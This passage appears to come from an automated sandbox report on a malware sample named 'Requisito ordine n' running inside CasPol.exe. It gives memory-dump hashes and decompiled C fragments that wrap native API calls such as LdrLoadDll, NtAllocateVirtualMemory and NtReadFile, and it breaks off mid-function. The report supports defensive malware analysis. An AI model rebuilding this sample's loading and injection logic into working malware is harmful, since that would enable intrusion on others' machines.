                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff745070000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 6$?__H
                                                                • API String ID: 0-3710698900
                                                                • Opcode ID: aceb1dc8d783fc908d796599a953440f029c7cb99f3986dd4f2276985309318f
                                                                • Instruction ID: 4323a5400cb22e96be037354268bd906a082b6ed38c76ad21970f3b70e7a3771
                                                                • Opcode Fuzzy Hash: aceb1dc8d783fc908d796599a953440f029c7cb99f3986dd4f2276985309318f
                                                                • Instruction Fuzzy Hash: DF6199B090495D8FEBA9EB28C898AE9B7F5FF68341F4441EAE10DD7251DA349DC18F04
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ?__H
                                                                • API String ID: 0-2882066015
                                                                • Opcode ID: d77bd94932c34fa9ce6ec1b2cff9e931ee27de872ee162683b37cde184fb976e
                                                                • Instruction ID: 09116859d8de84721bd9b68e4fbe6c97c691c4392ea4e90d030f87bd91f7d8c1
                                                                • Opcode Fuzzy Hash: d77bd94932c34fa9ce6ec1b2cff9e931ee27de872ee162683b37cde184fb976e
                                                                • Instruction Fuzzy Hash: D271BAB091491D8FEBA9EB28C895AE9B7F5FF68341F4041E9E20DD7251DA349EC18F04
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3f8f70752f47bb096a995a3053b97ce6a782fe61a8d41d11b01c8ef090660fe0
                                                                • Instruction ID: 603552c4ace47a10e47e14de478c1b91a50810d9ef7e9fb07e5c5aee019b1985
                                                                • Opcode Fuzzy Hash: 3f8f70752f47bb096a995a3053b97ce6a782fe61a8d41d11b01c8ef090660fe0
                                                                • Instruction Fuzzy Hash: 08C1B17191CA8D4FE786DB6C88647B97FF1EF6B345F4405BAD048CB293CA242886C711
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 740b30ad046307c9f610c990f1412515919ca4ab3e13f2f29ae63c6b8c002735
                                                                • Instruction ID: c99b32c18ef102af30bc2e6a9e07cfd6047d4d4cae9df1d91ffe063ebf57936b
                                                                • Opcode Fuzzy Hash: 740b30ad046307c9f610c990f1412515919ca4ab3e13f2f29ae63c6b8c002735
                                                                • Instruction Fuzzy Hash: 5A518C71A08A5D8FDB89EF6CD4556FDBBF1FF59350F00016AE049D7292CA35A882CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 914607cb833a2b02c35b81b4a7953cc6b5b7d90bd8784ed1c405189a2d341b67
                                                                • Instruction ID: 387e0d873c1804d0b2126c2491c0ddbfca0abd0c7e0e9dae6ff49987454ae516
                                                                • Opcode Fuzzy Hash: 914607cb833a2b02c35b81b4a7953cc6b5b7d90bd8784ed1c405189a2d341b67
                                                                • Instruction Fuzzy Hash: 43415E70A08A8D8FDB89EF6CC454AEDBBF1FF69340F10016AE449D7295CA34A881CB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7023976c4a6909d6ec05aaf42384670ca3496d67106aa7510415fbfda6c9ad9f
                                                                • Instruction ID: 243b708e945320206e6e8addc4b644f10f05da2b3f91f100fc6f3def0affa379
                                                                • Opcode Fuzzy Hash: 7023976c4a6909d6ec05aaf42384670ca3496d67106aa7510415fbfda6c9ad9f
                                                                • Instruction Fuzzy Hash: BE3188B1D195298EEBA8DB28D8546B8B7F1FF64341F5001FAE10DE3295DA386AC08F44
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ad2a8e41cf006220772edde14273a21970e4e041feaf2df3f1be2a76e2637da8
                                                                • Instruction ID: 1db8524a279cbf516ab4cb6fb776857e703eeb3661f2fa170f9620d3ccce0125
                                                                • Opcode Fuzzy Hash: ad2a8e41cf006220772edde14273a21970e4e041feaf2df3f1be2a76e2637da8
                                                                • Instruction Fuzzy Hash: 1211B8B0D0952A8FEB69DB28C854BFCB3B1FB64741F5041F9E10DA2295DA386AC4CF54
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 59423d941eff4bce7ef40ca6d740f4a8612a74a693599e4948cc73dabead09d7
                                                                • Instruction ID: 096017d769b9b0aee60e409254efffd4816ff4a1b869357ca7378cf4be69641e
                                                                • Opcode Fuzzy Hash: 59423d941eff4bce7ef40ca6d740f4a8612a74a693599e4948cc73dabead09d7
                                                                • Instruction Fuzzy Hash: 8001E87092464D9FDF84EF28C889AE93BE0FF18305F00016AB80DD3254DB30E9A1CB85
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 583726ddfefb73f06027242c9cbbddfccbb9a8645d32e09972bedc021efc06b4
                                                                • Instruction ID: 00137dbfd73aeebf6dbda33ab1f251608b625ce09b3dda1f3201434a005e10f3
                                                                • Opcode Fuzzy Hash: 583726ddfefb73f06027242c9cbbddfccbb9a8645d32e09972bedc021efc06b4
                                                                • Instruction Fuzzy Hash: 8BF0F46B70C5894BD312AA7DF8420EC7F10EFD2265F0A41BBD2C492182E624A15EC7A1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3b0424f5064c6315337e0279d42dfc6e01a1d284c823e13364b3490f7452ec60
                                                                • Instruction ID: 3adfe974059a16778043ce52152883c5657cbbeededf04c71a6c36d77d20b15d
                                                                • Opcode Fuzzy Hash: 3b0424f5064c6315337e0279d42dfc6e01a1d284c823e13364b3490f7452ec60
                                                                • Instruction Fuzzy Hash: 141186B0D0952E8EDBA8DB58C8547BDB7B1FB28741F0000F9D00DA6695DA786AC18F40
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Execution Graph

                                                                Execution Coverage:3.8%
                                                                Dynamic/Decrypted Code Coverage:2.5%
                                                                Signature Coverage:3.9%
                                                                Total number of Nodes:644
                                                                Total number of Limit Nodes:84

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 41e6de-41e70c call 41f223 NtClose
                                                                C-Code - Quality: 75%
                                                                			E0041E6DE(intOrPtr _a8, void* _a12) {
                                                                				long _t9;
                                                                
                                                                				_pop(ds);
                                                                				_t6 = _a8;
                                                                				E0041F223( *((intOrPtr*)(_a8 + 0x14)), _t6, _t6 + 0xa7c,  *((intOrPtr*)(_a8 + 0x14)), 0, 0x2c);
                                                                				_t9 = NtClose(_a12); // executed
                                                                				return _t9;
                                                                			}





                                                                APIs
                                                                • NtClose.NTDLL(004102D8,00000000,?,004102D8,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E708
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID: <sxU
                                                                • API String ID: 3535843008-837359753
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 286 40ced3-40cefc call 420ef3 289 40cf02-40cf10 call 421413 286->289 290 40cefe-40cf01 286->290 293 40cf20-40cf31 call 41f793 289->293 294 40cf12-40cf1d call 421693 289->294 299 40cf33-40cf47 LdrLoadDll 293->299 300 40cf4a-40cf4d 293->300 294->293 299->300
                                                                C-Code - Quality: 100%
                                                                			E0040CED3(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                				char* _v8;
                                                                				struct _EXCEPTION_RECORD _v12;
                                                                				struct _OBJDIR_INFORMATION _v16;
                                                                				char _v536;
                                                                				void* _t15;
                                                                				struct _OBJDIR_INFORMATION _t17;
                                                                				struct _OBJDIR_INFORMATION _t18;
                                                                				void* _t30;
                                                                				void* _t31;
                                                                				void* _t32;
                                                                
                                                                				_v8 =  &_v536;
                                                                				_t15 = E00420EF3( &_v12, 0x104, _a8);
                                                                				_t31 = _t30 + 0xc;
                                                                				if(_t15 != 0) {
                                                                					_t17 = E00421413(__eflags, _v8);
                                                                					_t32 = _t31 + 4;
                                                                					__eflags = _t17;
                                                                					if(_t17 != 0) {
                                                                						E00421693( &_v12, 0);
                                                                						_t32 = _t32 + 8;
                                                                					}
                                                                					_t18 = E0041F793(_v8);
                                                                					_v16 = _t18;
                                                                					__eflags = _t18;
                                                                					if(_t18 == 0) {
                                                                						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                						return _v16;
                                                                					}
                                                                					return _t18;
                                                                				} else {
                                                                					return _t15;
                                                                				}
                                                                			}














                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040CF45
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 301 41e78d-41e791 302 41e793-41e7d0 call 41f223 NtAllocateVirtualMemory 301->302 303 41e7f7-41e807 301->303 305 41e80a-41e80c 303->305 307 41e808 call 1669a00 303->307 307->305
                                                                C-Code - Quality: 58%
                                                                			E0041E78D(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                				long _t14;
                                                                
                                                                				asm("daa");
                                                                				asm("loope 0x66");
                                                                				_t10 = _a4;
                                                                				E0041F223( *((intOrPtr*)(_a4 + 0x14)), _t10, _t10 + 0xa8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
                                                                				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                				return _t14;
                                                                			}





                                                                APIs
                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E7CC
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateMemoryVirtual
                                                                • String ID:
                                                                • API String ID: 2167126740-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 316 41e5b3-41e604 call 41f223 NtCreateFile
                                                                C-Code - Quality: 100%
                                                                			E0041E5B3(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                				long _t21;
                                                                
                                                                				_t3 = _a4 + 0xa6c; // 0xa6c
                                                                				E0041F223( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
                                                                				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                				return _t21;
                                                                			}





                                                                APIs
                                                                • NtCreateFile.NTDLL(00000060,00000000,?,0041930F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041930F,?,00000000,00000060,00000000,00000000), ref: 0041E600
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 319 41e65d-41e6ac call 41f223 NtReadFile
                                                                APIs
                                                                • NtReadFile.NTDLL(004194D3,004149A3,FFFFFFFF,00418FB6,00000002,?,004194D3,00000002,00418FB6,FFFFFFFF,004149A3,004194D3,00000002,00000000), ref: 0041E6A8
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 322 41e663-41e679 323 41e67f-41e6ac NtReadFile 322->323 324 41e67a call 41f223 322->324 324->323
                                                                C-Code - Quality: 37%
                                                                			E0041E663(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                				void* _t18;
                                                                				intOrPtr* _t27;
                                                                
                                                                				_t3 = _a4 + 0xa74; // 0xa76
                                                                				_t27 = _t3;
                                                                				E0041F223( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
                                                                				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
                                                                				return _t18;
                                                                			}






                                                                APIs
                                                                • NtReadFile.NTDLL(004194D3,004149A3,FFFFFFFF,00418FB6,00000002,?,004194D3,00000002,00418FB6,FFFFFFFF,004149A3,004194D3,00000002,00000000), ref: 0041E6A8
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0041E793(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                				long _t14;
                                                                
                                                                				E0041F223( *((intOrPtr*)(_a4 + 0x14)), _a4, _t10 + 0xa8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
                                                                				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                				return _t14;
                                                                			}





                                                                APIs
                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E7CC
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateMemoryVirtual
                                                                • String ID:
                                                                • API String ID: 2167126740-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0041E6E3(intOrPtr _a4, void* _a8) {
                                                                				long _t8;
                                                                
                                                                				E0041F223( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
                                                                				_t8 = NtClose(_a8); // executed
                                                                				return _t8;
                                                                			}





                                                                APIs
                                                                • NtClose.NTDLL(004102D8,00000000,?,004102D8,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E708
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID:
                                                                • API String ID: 3535843008-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 3 41e903-41e91c 4 41e922-41e92b ExitProcess 3->4 5 41e91d call 41f223 3->5 5->4
                                                                C-Code - Quality: 100%
                                                                			E0041E903(intOrPtr _a4, int _a8) {
                                                                
                                                                				_t5 = _a4;
                                                                				E0041F223( *((intOrPtr*)(_a4 + 0x980)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x980)), 0, 0x36);
                                                                				ExitProcess(_a8);
                                                                			}



                                                                0x0041e906
                                                                0x0041e91d
                                                                0x0041e92b

                                                                APIs
                                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E92B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExitProcess
                                                                • String ID: G5@
                                                                • API String ID: 621844428-1585037681
                                                                • Opcode ID: 617ccf727b282b404c2f8b27e3b33080a1333c516f09a61b6c5667a9e896709c
                                                                • Instruction ID: cfca8e1907c1f24ac97838efb92421b828cf6b07f9a05c4ff859c04d5774fe7b
                                                                • Opcode Fuzzy Hash: 617ccf727b282b404c2f8b27e3b33080a1333c516f09a61b6c5667a9e896709c
                                                                • Instruction Fuzzy Hash: 83D0C2316002047BCB20DBC8DC45FD377ACDF45650F0080A5BA0C5B242C530BA00C7E0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 6 41e8fc-41e92b call 41f223 ExitProcess
                                                                C-Code - Quality: 100%
                                                                			E0041E8FC(intOrPtr _a4, int _a8) {
                                                                
                                                                				_t7 = _a4;
                                                                				E0041F223( *((intOrPtr*)(_a4 + 0x980)), _t7, _t7 + 0xaa8,  *((intOrPtr*)(_a4 + 0x980)), 0, 0x36);
                                                                				ExitProcess(_a8);
                                                                			}



                                                                0x0041e906
                                                                0x0041e91d
                                                                0x0041e92b

                                                                APIs
                                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E92B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExitProcess
                                                                • String ID: G5@
                                                                • API String ID: 621844428-1585037681
                                                                • Opcode ID: b5eb8c7284e0b1afb1aaa59d8cfe6a5d791b4cfa1d429cfee80398c8dfa6d21e
                                                                • Instruction ID: 25254aa45f2800970d74b2d606c2a39324453796c864d9a28a6af291f1becf86
                                                                • Opcode Fuzzy Hash: b5eb8c7284e0b1afb1aaa59d8cfe6a5d791b4cfa1d429cfee80398c8dfa6d21e
                                                                • Instruction Fuzzy Hash: 3CE0C2316002007BC7209F84CC86FD73768AF45750F048468B9185B382CA75EA04C7D0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 251 40984b-40984c 252 40984e-409852 251->252 253 40981f-409822 251->253 254 409854-4098a7 call 4201f3 call 420ca3 call 40ced3 call 402de3 call 4195b3 252->254 255 4098a9-4098ba PostThreadMessageW 252->255 253->251 254->255 256 4098e0-4098e6 254->256 255->256 257 4098bc-4098dd call 40c5a3 255->257 257->256
                                                                C-Code - Quality: 50%
                                                                			E0040984B(void* __eflags, long _a8, signed int _a12) {
                                                                				char _v59;
                                                                				char _v60;
                                                                				signed int __esi;
                                                                				void* __ebp;
                                                                				void* _t12;
                                                                				void* _t13;
                                                                				void* _t17;
                                                                
                                                                				if(__eflags != 0) {
                                                                					asm("cld");
                                                                					_push(_t19);
                                                                					_t13 = E0041FB83(_t12, _t17, 0x11c6f95e);
                                                                					return E0041FA43(_t17) + _t13 + 0x1000;
                                                                				} else {
                                                                					_pop(__edi);
                                                                					asm("repe mov dl, 0x74");
                                                                					asm("loop 0x57");
                                                                					_push(__ebp);
                                                                					__ebp = __esp;
                                                                					__esp = __esp - 0x40;
                                                                					_push(__ebx);
                                                                					_push(__esi);
                                                                					_push(__edi);
                                                                					__eax =  &_v59;
                                                                					_v60 = 0;
                                                                					__eax = E004201F3( &_v59, 0, 0x3f);
                                                                					__ecx =  &_v60;
                                                                					__eax = E00420CA3( &_v60, 3);
                                                                					__ebx = _a12;
                                                                					__edx =  &_v60;
                                                                					__esi = __ebx + 0x20;
                                                                					__eax = E0040CED3(__eflags, __ebx + 0x20,  &_v60); // executed
                                                                					__edi = __eax;
                                                                					__eax = E00402DE3(__edx, __eax, 0x40fa3591);
                                                                					__eax = E004195B3(__ebx + 0x20, __edi, 0, 0, __eax);
                                                                					__esi = __eax;
                                                                					__eflags = __esi;
                                                                					if(__esi != 0) {
                                                                						__edi = _a8;
                                                                						__eax = PostThreadMessageW(__edi, 0x111, 0, 0); // executed
                                                                						__eflags = __eax;
                                                                						if(__eax == 0) {
                                                                							__eflags = __ebx;
                                                                							__eax = E0040C5A3(1, 8, __ebx);
                                                                							__eax = __al & 0x000000ff;
                                                                							__ecx = __ebp + __eax - 0x40;
